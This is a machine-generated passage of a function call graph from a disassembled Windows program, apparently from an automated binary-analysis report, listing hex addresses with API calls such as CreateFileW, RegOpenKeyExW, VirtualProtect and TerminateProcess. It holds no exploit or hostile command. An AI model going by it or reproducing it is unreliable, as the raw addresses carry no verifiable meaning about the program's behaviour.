98067->97902 98068->97924 98069->97922 98070->97926 98071->97929 98073 157525 98072->98073 98089 157522 98072->98089 98074 15752d 98073->98074 98075 15755b 98073->98075 98121 1751c6 26 API calls 98074->98121 98077 1950f6 98075->98077 98080 15756d 98075->98080 98086 19500f 98075->98086 98124 175183 26 API calls 98077->98124 98078 15753d 98084 16fddb 22 API calls 98078->98084 98122 16fb21 51 API calls 98080->98122 98081 19510e 98081->98081 98085 157547 98084->98085 98087 159cb3 22 API calls 98085->98087 98088 16fe0b 22 API calls 98086->98088 98091 195088 98086->98091 98087->98089 98090 195058 98088->98090 98089->97935 98092 16fddb 22 API calls 98090->98092 98123 16fb21 51 API calls 98091->98123 98093 19507f 98092->98093 98094 159cb3 22 API calls 98093->98094 98094->98091 98096 15a961 22 API calls 98095->98096 98097 1b92de 98096->98097 98098 156270 22 API calls 98097->98098 98099 1b92f2 98098->98099 98106 1b9314 98099->98106 98125 1b8e54 98099->98125 98102 1b8e54 41 API calls 98102->98106 98105 156350 22 API calls 98105->98106 98106->98102 98106->98105 98107 1b93b3 98106->98107 98109 1b9397 98106->98109 98133 156d25 22 API calls __fread_nolock 98106->98133 98108 15a8c7 22 API calls 98107->98108 98110 1b93c2 98107->98110 98108->98110 98134 156d25 22 API calls __fread_nolock 98109->98134 98110->97965 98112 1b93a7 98113 156350 22 API calls 98112->98113 98113->98107 98114->97944 98115->97954 98116->97961 98117->97963 98118->97947 98119->97958 98120->97963 98121->98078 98122->98078 98123->98077 98124->98081 98127 1b8e74 _wcslen 98125->98127 98126 1b8f63 98126->98106 98132 156d25 22 API calls __fread_nolock 98126->98132 98127->98126 98128 1b8f68 98127->98128 98130 1b8ea9 98127->98130 98128->98126 98136 16ce60 41 API calls 98128->98136 98130->98126 98135 16ce60 41 API calls 98130->98135 98132->98106 98133->98106 98134->98112 98135->98130 98136->98128 98138 15575c CreateFileW 98137->98138 98139 194035 98137->98139 98140 15577b 98138->98140 98139->98140 98141 19403b CreateFileW 98139->98141 98140->98004 98140->98005 98141->98140 98142 194063 98141->98142 98158 1554c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98142->98158 98144 19406e 98144->98140 98145->97968 98146->97986 98147->97996 98148->98011 98149->98009 98150->98010 98151->98015 98153 1bcd19 WriteFile 98152->98153 98154 1bcd0e 98152->98154 98153->98013 98159 1bcc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98154->98159 98156->98020 98157->98020 98158->98144 98159->98153 98161 1c99e8 98160->98161 98162 1c9902 98160->98162 98218 1c9caa 39 API calls 98161->98218 98164 16fddb 22 API calls 98162->98164 98165 1c9909 98164->98165 98167 16fe0b 22 API calls 98165->98167 98166 1c99a2 98168 1c99ca 98166->98168 98171 1c9ac5 98166->98171 98177 1c9a33 98166->98177 98169 1c991a 98167->98169 98168->98028 98170 156246 CloseHandle 98169->98170 98172 1c9925 98170->98172 98211 1c1e96 98171->98211 98174 15a961 22 API calls 98172->98174 98175 1c992d 98174->98175 98179 156246 CloseHandle 98175->98179 98176 1c9acc 98181 1bccff 4 API calls 98176->98181 98178 157510 53 API calls 98177->98178 98187 1c9a3a 98178->98187 98180 1c9934 98179->98180 98183 157510 53 API calls 98180->98183 98205 1c9aa8 98181->98205 98182 1c9abb 98220 1bcd57 30 API calls 98182->98220 98186 1c9940 98183->98186 98184 1c9a6e 98188 156270 22 API calls 98184->98188 98189 156246 CloseHandle 98186->98189 98187->98182 98187->98184 98191 1c9a7e 98188->98191 98192 1c994a 98189->98192 98190 156246 CloseHandle 98193 1c9b1e 98190->98193 98194 1c9a8e 98191->98194 98198 15a8c7 22 API calls 98191->98198 98195 155745 5 API calls 98192->98195 98221 156216 CloseHandle messages 98193->98221 98196 1533c6 22 API calls 98194->98196 98199 1c9959 98195->98199 98200 1c9a9c 98196->98200 98198->98194 98201 1c995d 98199->98201 98202 1c99c2 98199->98202 98219 1bcd57 30 API calls 98200->98219 98215 1553de 27 API calls messages 98201->98215 98217 156216 CloseHandle messages 98202->98217 98205->98168 98205->98190 98207 1c996b 98216 1553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98207->98216 98209 1c9972 98209->98166 98210 1bccff 4 API calls 98209->98210 98210->98166 98212 1c1e9f 98211->98212 98213 1c1ea4 98211->98213 98222 1c0f67 24 API calls __fread_nolock 98212->98222 98213->98176 98215->98207 98216->98209 98217->98168 98218->98166 98219->98205 98220->98205 98221->98168 98222->98213 98224 157510 53 API calls 98223->98224 98225 1d7f90 98224->98225 98249 1d7fd5 messages 98225->98249 98261 1d8cd3 98225->98261 98227 1d8281 98228 1d844f 98227->98228 98234 1d828f 98227->98234 98302 1d8ee4 60 API calls 98228->98302 98231 1d845e 98233 1d846a 98231->98233 98231->98234 98232 157510 53 API calls 98251 1d8049 98232->98251 98233->98249 98274 1d7e86 98234->98274 98239 1d82c8 98289 16fc70 98239->98289 98242 1d82e8 98295 1c359c 82 API calls __wsopen_s 98242->98295 98243 1d8302 98296 1563eb 22 API calls 98243->98296 98246 1d82f3 GetCurrentProcess TerminateProcess 98246->98243 98247 1d8311 98297 156a50 22 API calls 98247->98297 98249->98031 98250 1d832a 98259 1d8352 98250->98259 98298 1604f0 22 API calls 98250->98298 98251->98227 98251->98232 98251->98249 98293 1b417d 22 API calls __fread_nolock 98251->98293 98294 1d851d 42 API calls _strftime 98251->98294 98252 1d84c5 98252->98249 98257 1d84d9 FreeLibrary 98252->98257 98254 1d8341 98299 1d8b7b 75 API calls 98254->98299 98257->98249 98259->98252 98300 1604f0 22 API calls 98259->98300 98301 15aceb 23 API calls messages 98259->98301 98303 1d8b7b 75 API calls 98259->98303 98262 15aec9 22 API calls 98261->98262 98263 1d8cee CharLowerBuffW 98262->98263 98264 1b8e54 41 API calls 98263->98264 98265 1d8d0f 98264->98265 98267 15a961 22 API calls 98265->98267 98273 1d8d48 _wcslen 98265->98273 98268 1d8d2a 98267->98268 98304 156d25 22 API calls __fread_nolock 98268->98304 98270 1d8d3e 98271 1593b2 22 API calls 98270->98271 98271->98273 98272 1d8e5e _wcslen 98272->98251 98273->98272 98305 1d851d 42 API calls _strftime 98273->98305 98275 1d7ea1 98274->98275 98279 1d7eec 98274->98279 98276 16fe0b 22 API calls 98275->98276 98277 1d7ec3 98276->98277 98278 16fddb 22 API calls 98277->98278 98277->98279 98278->98277 98280 1d9096 98279->98280 98281 1d92ab messages 98280->98281 98288 1d90ba _strcat _wcslen 98280->98288 98281->98239 98282 15b567 39 API calls 98282->98288 98283 15b38f 39 API calls 98283->98288 98284 15b6b5 39 API calls 98284->98288 98285 17ea0c 21 API calls ___std_exception_copy 98285->98288 98286 157510 53 API calls 98286->98288 98288->98281 98288->98282 98288->98283 98288->98284 98288->98285 98288->98286 98306 1befae 24 API calls _wcslen 98288->98306 98290 16fc85 98289->98290 98291 16fd1d VirtualProtect 98290->98291 98292 16fceb 98290->98292 98291->98292 98292->98242 98292->98243 98293->98251 98294->98251 98295->98246 98296->98247 98297->98250 98298->98254 98299->98259 98300->98259 98301->98259 98302->98231 98303->98259 98304->98270 98305->98272 98306->98288 98307->98054 98308->98054 98309->98049 98310->98049 98311->98053 98312->98049 98313 1703fb 98314 170407 ___DestructExceptionObject 98313->98314 98342 16feb1 98314->98342 98316 17040e 98317 170561 98316->98317 98320 170438 98316->98320 98369 17083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98317->98369 98319 170568 98370 174e52 28 API calls _abort 98319->98370 98331 170477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98320->98331 98353 18247d 98320->98353 98322 17056e 98371 174e04 28 API calls _abort 98322->98371 98325 170576 98327 170457 98329 1704d8 98361 170959 98329->98361 98331->98329 98365 174e1a 38 API calls 3 library calls 98331->98365 98333 1704de 98334 1704f3 98333->98334 98366 170992 GetModuleHandleW 98334->98366 98336 1704fa 98336->98319 98337 1704fe 98336->98337 98338 170507 98337->98338 98367 174df5 28 API calls _abort 98337->98367 98368 170040 13 API calls 2 library calls 98338->98368 98341 17050f 98341->98327 98343 16feba 98342->98343 98372 170698 IsProcessorFeaturePresent 98343->98372 98345 16fec6 98373 172c94 10 API calls 3 library calls 98345->98373 98347 16fecb 98348 16fecf 98347->98348 98374 182317 98347->98374 98348->98316 98351 16fee6 98351->98316 98354 182494 98353->98354 98355 170a8c _ValidateLocalCookies 5 API calls 98354->98355 98356 170451 98355->98356 98356->98327 98357 182421 98356->98357 98360 182450 98357->98360 98358 170a8c _ValidateLocalCookies 5 API calls 98359 182479 98358->98359 98359->98331 98360->98358 98433 172340 98361->98433 98364 17097f 98364->98333 98365->98329 98366->98336 98367->98338 98368->98341 98369->98319 98370->98322 98371->98325 98372->98345 98373->98347 98378 18d1f6 98374->98378 98377 172cbd 8 API calls 3 library calls 98377->98348 98381 18d213 98378->98381 98382 18d20f 98378->98382 98380 16fed8 98380->98351 98380->98377 98381->98382 98384 184bfb 98381->98384 98396 170a8c 98382->98396 98385 184c07 ___DestructExceptionObject 98384->98385 98403 182f5e EnterCriticalSection 98385->98403 98387 184c0e 98404 1850af 98387->98404 98389 184c1d 98390 184c2c 98389->98390 98417 184a8f 29 API calls 98389->98417 98419 184c48 LeaveCriticalSection _abort 98390->98419 98393 184c27 98418 184b45 GetStdHandle GetFileType 98393->98418 98394 184c3d __fread_nolock 98394->98381 98397 170a97 IsProcessorFeaturePresent 98396->98397 98398 170a95 98396->98398 98400 170c5d 98397->98400 98398->98380 98432 170c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98400->98432 98402 170d40 98402->98380 98403->98387 98405 1850bb ___DestructExceptionObject 98404->98405 98406 1850c8 98405->98406 98407 1850df 98405->98407 98428 17f2d9 20 API calls __dosmaperr 98406->98428 98420 182f5e EnterCriticalSection 98407->98420 98410 1850cd 98429 1827ec 26 API calls pre_c_initialization 98410->98429 98412 1850d7 __fread_nolock 98412->98389 98413 1850eb 98416 185117 98413->98416 98421 185000 98413->98421 98430 18513e LeaveCriticalSection _abort 98416->98430 98417->98393 98418->98390 98419->98394 98420->98413 98422 184c7d __dosmaperr 20 API calls 98421->98422 98423 185012 98422->98423 98427 18501f 98423->98427 98431 183405 11 API calls 2 library calls 98423->98431 98424 1829c8 _free 20 API calls 98426 185071 98424->98426 98426->98413 98427->98424 98428->98410 98429->98412 98430->98412 98431->98423 98432->98402 98434 17096c GetStartupInfoW 98433->98434 98434->98364 98435 151098 98440 1542de 98435->98440 98439 1510a7 98441 15a961 22 API calls 98440->98441 98442 1542f5 GetVersionExW 98441->98442 98443 156b57 22 API calls 98442->98443 98444 154342 98443->98444 98445 1593b2 22 API calls 98444->98445 98455 154378 98444->98455 98446 15436c 98445->98446 98448 1537a0 22 API calls 98446->98448 98447 15441b GetCurrentProcess IsWow64Process 98449 154437 98447->98449 98448->98455 98450 15444f LoadLibraryA 98449->98450 98451 193824 GetSystemInfo 98449->98451 98452 154460 GetProcAddress 98450->98452 98453 15449c GetSystemInfo 98450->98453 98452->98453 98457 154470 GetNativeSystemInfo 98452->98457 98454 154476 98453->98454 98458 15109d 98454->98458 98459 15447a FreeLibrary 98454->98459 98455->98447 98456 1937df 98455->98456 98457->98454 98460 1700a3 29 API calls __onexit 98458->98460 98459->98458 98460->98439 98461 15105b 98466 15344d 98461->98466 98463 15106a 98497 1700a3 29 API calls __onexit 98463->98497 98465 151074 98467 15345d __wsopen_s 98466->98467 98468 15a961 22 API calls 98467->98468 98469 153513 98468->98469 98470 153a5a 24 API calls 98469->98470 98471 15351c 98470->98471 98498 153357 98471->98498 98474 1533c6 22 API calls 98475 153535 98474->98475 98476 15515f 22 API calls 98475->98476 98477 153544 98476->98477 98478 15a961 22 API calls 98477->98478 98479 15354d 98478->98479 98480 15a6c3 22 API calls 98479->98480 98481 153556 RegOpenKeyExW 98480->98481 98482 193176 RegQueryValueExW 98481->98482 98487 153578 98481->98487 98483 19320c RegCloseKey 98482->98483 98484 193193 98482->98484 98483->98487 98496 19321e _wcslen 98483->98496 98485 16fe0b 22 API calls 98484->98485 98486 1931ac 98485->98486 98488 155722 22 API calls 98486->98488 98487->98463 98489 1931b7 RegQueryValueExW 98488->98489 98491 1931d4 98489->98491 98493 1931ee messages 98489->98493 98490 154c6d 22 API calls 98490->98496 98492 156b57 22 API calls 98491->98492 98492->98493 98493->98483 98494 159cb3 22 API calls 98494->98496 98495 15515f 22 API calls 98495->98496 98496->98487 98496->98490 98496->98494 98496->98495 98497->98465 98499 191f50 __wsopen_s 98498->98499 98500 153364 GetFullPathNameW 98499->98500 98501 153386 98500->98501 98502 156b57 22 API calls 98501->98502 98503 1533a4 98502->98503 98503->98474 98504 1a3f75 98515 16ceb1 98504->98515 98506 1a3f8b 98507 1a4006 98506->98507 98582 16e300 23 API calls 98506->98582 98524 15bf40 98507->98524 98510 1a4052 98513 1a4a88 98510->98513 98584 1c359c 82 API calls __wsopen_s 98510->98584 98512 1a3fe6 98512->98510 98583 1c1abf 22 API calls 98512->98583 98516 16ced2 98515->98516 98517 16cebf 98515->98517 98519 16ced7 98516->98519 98520 16cf05 98516->98520 98585 15aceb 23 API calls messages 98517->98585 98521 16fddb 22 API calls 98519->98521 98586 15aceb 23 API calls messages 98520->98586 98523 16cec9 98521->98523 98523->98506 98587 15adf0 98524->98587 98526 15bf9d 98527 1a04b6 98526->98527 98528 15bfa9 98526->98528 98606 1c359c 82 API calls __wsopen_s 98527->98606 98529 1a04c6 98528->98529 98530 15c01e 98528->98530 98607 1c359c 82 API calls __wsopen_s 98529->98607 98592 15ac91 98530->98592 98534 15c7da 98539 16fe0b 22 API calls 98534->98539 98535 1b7120 22 API calls 98568 15c039 __fread_nolock messages 98535->98568 98544 15c808 __fread_nolock 98539->98544 98541 1a04f5 98545 1a055a 98541->98545 98608 16d217 207 API calls 98541->98608 98549 16fe0b 22 API calls 98544->98549 98581 15c603 98545->98581 98609 1c359c 82 API calls __wsopen_s 98545->98609 98546 15ec40 207 API calls 98546->98568 98547 15af8a 22 API calls 98547->98568 98548 1a091a 98619 1c3209 23 API calls 98548->98619 98573 15c350 __fread_nolock messages 98549->98573 98552 1a08a5 98553 15ec40 207 API calls 98552->98553 98555 1a08cf 98553->98555 98555->98581 98617 15a81b 41 API calls 98555->98617 98556 1a0591 98610 1c359c 82 API calls __wsopen_s 98556->98610 98557 1a08f6 98618 1c359c 82 API calls __wsopen_s 98557->98618 98562 15bbe0 40 API calls 98562->98568 98563 15c3ac 98563->98510 98565 15c237 98567 15c253 98565->98567 98569 15a8c7 22 API calls 98565->98569 98566 16fddb 22 API calls 98566->98568 98570 1a0976 98567->98570 98575 15c297 messages 98567->98575 98568->98534 98568->98535 98568->98541 98568->98544 98568->98545 98568->98546 98568->98547 98568->98548 98568->98552 98568->98556 98568->98557 98568->98562 98568->98565 98568->98566 98574 1a09bf 98568->98574 98580 16fe0b 22 API calls 98568->98580 98568->98581 98596 15ad81 98568->98596 98611 1b7099 22 API calls __fread_nolock 98568->98611 98612 1d5745 54 API calls _wcslen 98568->98612 98613 16aa42 22 API calls messages 98568->98613 98614 1bf05c 40 API calls 98568->98614 98615 15a993 41 API calls 98568->98615 98616 15aceb 23 API calls messages 98568->98616 98569->98567 98620 15aceb 23 API calls messages 98570->98620 98573->98563 98605 16ce17 22 API calls messages 98573->98605 98574->98581 98621 1c359c 82 API calls __wsopen_s 98574->98621 98575->98574 98603 15aceb 23 API calls messages 98575->98603 98577 15c335 98577->98574 98578 15c342 98577->98578 98604 15a704 22 API calls messages 98578->98604 98580->98568 98581->98510 98582->98512 98583->98507 98584->98513 98585->98523 98586->98523 98588 15ae01 98587->98588 98591 15ae1c messages 98587->98591 98589 15aec9 22 API calls 98588->98589 98590 15ae09 CharUpperBuffW 98589->98590 98590->98591 98591->98526 98593 15acae 98592->98593 98594 15acd1 98593->98594 98622 1c359c 82 API calls __wsopen_s 98593->98622 98594->98568 98597 19fadb 98596->98597 98598 15ad92 98596->98598 98599 16fddb 22 API calls 98598->98599 98600 15ad99 98599->98600 98623 15adcd 98600->98623 98603->98577 98604->98573 98605->98573 98606->98529 98607->98581 98608->98545 98609->98581 98610->98581 98611->98568 98612->98568 98613->98568 98614->98568 98615->98568 98616->98568 98617->98557 98618->98581 98619->98565 98620->98574 98621->98581 98622->98594 98627 15addd 98623->98627 98624 15adb6 98624->98568 98625 16fddb 22 API calls 98625->98627 98626 15a961 22 API calls 98626->98627 98627->98624 98627->98625 98627->98626 98628 15a8c7 22 API calls 98627->98628 98629 15adcd 22 API calls 98627->98629 98628->98627 98629->98627 98630 15dee5 98633 15b710 98630->98633 98634 15b72b 98633->98634 98635 1a00f8 98634->98635 98636 1a0146 98634->98636 98644 15b750 98634->98644 98639 1a0102 98635->98639 98642 1a010f 98635->98642 98635->98644 98675 1d58a2 207 API calls 2 library calls 98636->98675 98673 1d5d33 207 API calls 98639->98673 98655 15ba20 98642->98655 98674 1d61d0 207 API calls 2 library calls 98642->98674 98647 16d336 40 API calls 98644->98647 98650 15ba4e 98644->98650 98652 1a0322 98644->98652 98644->98655 98660 15bbe0 40 API calls 98644->98660 98661 15ec40 207 API calls 98644->98661 98662 15a8c7 22 API calls 98644->98662 98664 15a81b 41 API calls 98644->98664 98665 16d2f0 40 API calls 98644->98665 98666 16a01b 207 API calls 98644->98666 98667 170242 5 API calls __Init_thread_wait 98644->98667 98668 16edcd 22 API calls 98644->98668 98669 1700a3 29 API calls __onexit 98644->98669 98670 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98644->98670 98671 16ee53 82 API calls 98644->98671 98672 16e5ca 207 API calls 98644->98672 98676 15aceb 23 API calls messages 98644->98676 98677 1af6bf 23 API calls 98644->98677 98646 1a03d9 98646->98646 98647->98644 98678 1d5c0c 82 API calls 98652->98678 98655->98650 98679 1c359c 82 API calls __wsopen_s 98655->98679 98660->98644 98661->98644 98662->98644 98664->98644 98665->98644 98666->98644 98667->98644 98668->98644 98669->98644 98670->98644 98671->98644 98672->98644 98673->98642 98674->98655 98675->98644 98676->98644 98677->98644 98678->98655 98679->98646 98680 151044 98685 1510f3 98680->98685 98682 15104a 98721 1700a3 29 API calls __onexit 98682->98721 98684 151054 98722 151398 98685->98722 98689 15116a 98690 15a961 22 API calls 98689->98690 98691 151174 98690->98691 98692 15a961 22 API calls 98691->98692 98693 15117e 98692->98693 98694 15a961 22 API calls 98693->98694 98695 151188 98694->98695 98696 15a961 22 API calls 98695->98696 98697 1511c6 98696->98697 98698 15a961 22 API calls 98697->98698 98699 151292 98698->98699 98732 15171c 98699->98732 98703 1512c4 98704 15a961 22 API calls 98703->98704 98705 1512ce 98704->98705 98706 161940 9 API calls 98705->98706 98707 1512f9 98706->98707 98753 151aab 98707->98753 98709 151315 98710 151325 GetStdHandle 98709->98710 98711 192485 98710->98711 98712 15137a 98710->98712 98711->98712 98713 19248e 98711->98713 98715 151387 OleInitialize 98712->98715 98714 16fddb 22 API calls 98713->98714 98716 192495 98714->98716 98715->98682 98760 1c011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98716->98760 98718 19249e 98761 1c0944 CreateThread 98718->98761 98720 1924aa CloseHandle 98720->98712 98721->98684 98762 1513f1 98722->98762 98725 1513f1 22 API calls 98726 1513d0 98725->98726 98727 15a961 22 API calls 98726->98727 98728 1513dc 98727->98728 98729 156b57 22 API calls 98728->98729 98730 151129 98729->98730 98731 151bc3 6 API calls 98730->98731 98731->98689 98733 15a961 22 API calls 98732->98733 98734 15172c 98733->98734 98735 15a961 22 API calls 98734->98735 98736 151734 98735->98736 98737 15a961 22 API calls 98736->98737 98738 15174f 98737->98738 98739 16fddb 22 API calls 98738->98739 98740 15129c 98739->98740 98741 151b4a 98740->98741 98742 151b58 98741->98742 98743 15a961 22 API calls 98742->98743 98744 151b63 98743->98744 98745 15a961 22 API calls 98744->98745 98746 151b6e 98745->98746 98747 15a961 22 API calls 98746->98747 98748 151b79 98747->98748 98749 15a961 22 API calls 98748->98749 98750 151b84 98749->98750 98751 16fddb 22 API calls 98750->98751 98752 151b96 RegisterWindowMessageW 98751->98752 98752->98703 98754 19272d 98753->98754 98755 151abb 98753->98755 98769 1c3209 23 API calls 98754->98769 98757 16fddb 22 API calls 98755->98757 98759 151ac3 98757->98759 98758 192738 98759->98709 98760->98718 98761->98720 98770 1c092a 28 API calls 98761->98770 98763 15a961 22 API calls 98762->98763 98764 1513fc 98763->98764 98765 15a961 22 API calls 98764->98765 98766 151404 98765->98766 98767 15a961 22 API calls 98766->98767 98768 1513c6 98767->98768 98768->98725 98769->98758 98771 15ddc0 98774 15aa19 98771->98774 98773 15ddcc 98775 15aa3a 98774->98775 98782 15aa8f 98774->98782 98776 15ec40 207 API calls 98775->98776 98775->98782 98778 15aa6b 98776->98778 98780 15aabe 98778->98780 98783 15aceb 23 API calls messages 98778->98783 98779 19f907 98779->98779 98780->98773 98782->98780 98784 1c359c 82 API calls __wsopen_s 98782->98784 98783->98782 98784->98779 98785 152de3 98786 152df0 __wsopen_s 98785->98786 98787 192c2b ___scrt_fastfail 98786->98787 98788 152e09 98786->98788 98790 192c47 GetOpenFileNameW 98787->98790 98789 153aa2 23 API calls 98788->98789 98791 152e12 98789->98791 98792 192c96 98790->98792 98801 152da5 98791->98801 98795 156b57 22 API calls 98792->98795 98797 192cab 98795->98797 98797->98797 98798 152e27 98819 1544a8 98798->98819 98802 191f50 __wsopen_s 98801->98802 98803 152db2 GetLongPathNameW 98802->98803 98804 156b57 22 API calls 98803->98804 98805 152dda 98804->98805 98806 153598 98805->98806 98807 15a961 22 API calls 98806->98807 98808 1535aa 98807->98808 98809 153aa2 23 API calls 98808->98809 98810 1535b5 98809->98810 98811 1535c0 98810->98811 98817 1932eb 98810->98817 98812 15515f 22 API calls 98811->98812 98814 1535cc 98812->98814 98849 1535f3 98814->98849 98816 19330d 98817->98816 98855 16ce60 41 API calls 98817->98855 98818 1535df 98818->98798 98820 154ecb 94 API calls 98819->98820 98821 1544cd 98820->98821 98822 193833 98821->98822 98823 154ecb 94 API calls 98821->98823 98824 1c2cf9 80 API calls 98822->98824 98825 1544e1 98823->98825 98826 193848 98824->98826 98825->98822 98827 1544e9 98825->98827 98828 193869 98826->98828 98829 19384c 98826->98829 98831 1544f5 98827->98831 98832 193854 98827->98832 98830 16fe0b 22 API calls 98828->98830 98833 154f39 68 API calls 98829->98833 98838 1938ae 98830->98838 98873 15940c 136 API calls 2 library calls 98831->98873 98874 1bda5a 82 API calls 98832->98874 98833->98832 98836 193862 98836->98828 98837 152e31 98839 193a5f 98838->98839 98841 193a67 98838->98841 98846 159cb3 22 API calls 98838->98846 98856 1b967e 98838->98856 98859 15a4a1 98838->98859 98867 153ff7 98838->98867 98875 1b95ad 42 API calls _wcslen 98838->98875 98876 1c0b5a 22 API calls 98838->98876 98839->98841 98840 154f39 68 API calls 98840->98841 98841->98840 98877 1b989b 82 API calls __wsopen_s 98841->98877 98846->98838 98850 153624 __fread_nolock 98849->98850 98851 153605 98849->98851 98852 16fddb 22 API calls 98850->98852 98854 16fe0b 22 API calls 98851->98854 98853 15363b 98852->98853 98853->98818 98854->98850 98855->98817 98857 16fe0b 22 API calls 98856->98857 98858 1b96ae __fread_nolock 98857->98858 98858->98838 98860 15a52b 98859->98860 98866 15a4b1 __fread_nolock 98859->98866 98862 16fe0b 22 API calls 98860->98862 98861 16fddb 22 API calls 98863 15a4b8 98861->98863 98862->98866 98864 15a4d6 98863->98864 98865 16fddb 22 API calls 98863->98865 98864->98838 98865->98864 98866->98861 98868 15400a 98867->98868 98872 1540ae 98867->98872 98869 16fe0b 22 API calls 98868->98869 98871 15403c 98868->98871 98869->98871 98870 16fddb 22 API calls 98870->98871 98871->98870 98871->98872 98872->98838 98873->98837 98874->98836 98875->98838 98876->98838 98877->98841 98878 151cad SystemParametersInfoW 98879 188402 98884 1881be 98879->98884 98882 18842a 98889 1881ef try_get_first_available_module 98884->98889 98886 1883ee 98903 1827ec 26 API calls pre_c_initialization 98886->98903 98888 188343 98888->98882 98896 190984 98888->98896 98895 188338 98889->98895 98899 178e0b 40 API calls 2 library calls 98889->98899 98891 18838c 98891->98895 98900 178e0b 40 API calls 2 library calls 98891->98900 98893 1883ab 98893->98895 98901 178e0b 40 API calls 2 library calls 98893->98901 98895->98888 98902 17f2d9 20 API calls __dosmaperr 98895->98902 98904 190081 98896->98904 98898 19099f 98898->98882 98899->98891 98900->98893 98901->98895 98902->98886 98903->98888 98905 19008d ___DestructExceptionObject 98904->98905 98906 19009b 98905->98906 98908 1900d4 98905->98908 98962 17f2d9 20 API calls __dosmaperr 98906->98962 98915 19065b 98908->98915 98909 1900a0 98963 1827ec 26 API calls pre_c_initialization 98909->98963 98914 1900aa __fread_nolock 98914->98898 98965 19042f 98915->98965 98918 19068d 98997 17f2c6 20 API calls __dosmaperr 98918->98997 98919 1906a6 98983 185221 98919->98983 98922 190692 98998 17f2d9 20 API calls __dosmaperr 98922->98998 98923 1906ab 98924 1906cb 98923->98924 98925 1906b4 98923->98925 98996 19039a CreateFileW 98924->98996 98999 17f2c6 20 API calls __dosmaperr 98925->98999 98929 1900f8 98964 190121 LeaveCriticalSection __wsopen_s 98929->98964 98930 1906b9 99000 17f2d9 20 API calls __dosmaperr 98930->99000 98931 190781 GetFileType 98934 19078c GetLastError 98931->98934 98935 1907d3 98931->98935 98933 190756 GetLastError 99002 17f2a3 20 API calls __dosmaperr 98933->99002 99003 17f2a3 20 API calls __dosmaperr 98934->99003 99005 18516a 21 API calls 2 library calls 98935->99005 98936 190704 98936->98931 98936->98933 99001 19039a CreateFileW 98936->99001 98940 19079a CloseHandle 98940->98922 98943 1907c3 98940->98943 98942 190749 98942->98931 98942->98933 99004 17f2d9 20 API calls __dosmaperr 98943->99004 98944 1907f4 98946 190840 98944->98946 99006 1905ab 72 API calls 3 library calls 98944->99006 98951 19086d 98946->98951 99007 19014d 72 API calls 4 library calls 98946->99007 98947 1907c8 98947->98922 98950 190866 98950->98951 98952 19087e 98950->98952 98953 1886ae __wsopen_s 29 API calls 98951->98953 98952->98929 98954 1908fc CloseHandle 98952->98954 98953->98929 99008 19039a CreateFileW 98954->99008 98956 190927 98957 190931 GetLastError 98956->98957 98958 19095d 98956->98958 99009 17f2a3 20 API calls __dosmaperr 98957->99009 98958->98929 98960 19093d 99010 185333 21 API calls 2 library calls 98960->99010 98962->98909 98963->98914 98964->98914 98966 190450 98965->98966 98967 19046a 98965->98967 98966->98967 99018 17f2d9 20 API calls __dosmaperr 98966->99018 99011 1903bf 98967->99011 98970 1904a2 98973 1904d1 98970->98973 99020 17f2d9 20 API calls __dosmaperr 98970->99020 98971 19045f 99019 1827ec 26 API calls pre_c_initialization 98971->99019 98980 190524 98973->98980 99022 17d70d 26 API calls 2 library calls 98973->99022 98976 19051f 98978 19059e 98976->98978 98976->98980 98977 1904c6 99021 1827ec 26 API calls pre_c_initialization 98977->99021 99023 1827fc 11 API calls _abort 98978->99023 98980->98918 98980->98919 98982 1905aa 98984 18522d ___DestructExceptionObject 98983->98984 99026 182f5e EnterCriticalSection 98984->99026 98986 18527b 99027 18532a 98986->99027 98988 185259 98991 185000 __wsopen_s 21 API calls 98988->98991 98989 185234 98989->98986 98989->98988 98993 1852c7 EnterCriticalSection 98989->98993 98990 1852a4 __fread_nolock 98990->98923 98992 18525e 98991->98992 98992->98986 99030 185147 EnterCriticalSection 98992->99030 98993->98986 98995 1852d4 LeaveCriticalSection 98993->98995 98995->98989 98996->98936 98997->98922 98998->98929 98999->98930 99000->98922 99001->98942 99002->98922 99003->98940 99004->98947 99005->98944 99006->98946 99007->98950 99008->98956 99009->98960 99010->98958 99013 1903d7 99011->99013 99012 1903f2 99012->98970 99013->99012 99024 17f2d9 20 API calls __dosmaperr 99013->99024 99015 190416 99025 1827ec 26 API calls pre_c_initialization 99015->99025 99017 190421 99017->98970 99018->98971 99019->98967 99020->98977 99021->98973 99022->98976 99023->98982 99024->99015 99025->99017 99026->98989 99031 182fa6 LeaveCriticalSection 99027->99031 99029 185331 99029->98990 99030->98986 99031->99029 99032 1a2a00 99047 15d7b0 messages 99032->99047 99033 15db11 PeekMessageW 99033->99047 99034 15d807 GetInputState 99034->99033 99034->99047 99035 1a1cbe TranslateAcceleratorW 99035->99047 99037 15db8f PeekMessageW 99037->99047 99038 15da04 timeGetTime 99038->99047 99039 15db73 TranslateMessage DispatchMessageW 99039->99037 99040 15dbaf Sleep 99057 15dbc0 99040->99057 99041 1a2b74 Sleep 99041->99057 99042 16e551 timeGetTime 99042->99057 99043 1a1dda timeGetTime 99095 16e300 23 API calls 99043->99095 99046 1a2c0b GetExitCodeProcess 99051 1a2c21 WaitForSingleObject 99046->99051 99052 1a2c37 CloseHandle 99046->99052 99047->99033 99047->99034 99047->99035 99047->99037 99047->99038 99047->99039 99047->99040 99047->99041 99047->99043 99050 15d9d5 99047->99050 99060 15ec40 207 API calls 99047->99060 99061 15bf40 207 API calls 99047->99061 99062 161310 207 API calls 99047->99062 99064 15dd50 99047->99064 99071 15dfd0 99047->99071 99094 16edf6 IsDialogMessageW GetClassLongW 99047->99094 99096 1c3a2a 23 API calls 99047->99096 99097 1c359c 82 API calls __wsopen_s 99047->99097 99048 1e29bf GetForegroundWindow 99048->99057 99051->99047 99051->99052 99052->99057 99053 1a2a31 99053->99050 99054 1a2ca9 Sleep 99054->99047 99057->99042 99057->99046 99057->99047 99057->99048 99057->99050 99057->99053 99057->99054 99098 1d5658 23 API calls 99057->99098 99099 1be97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99057->99099 99100 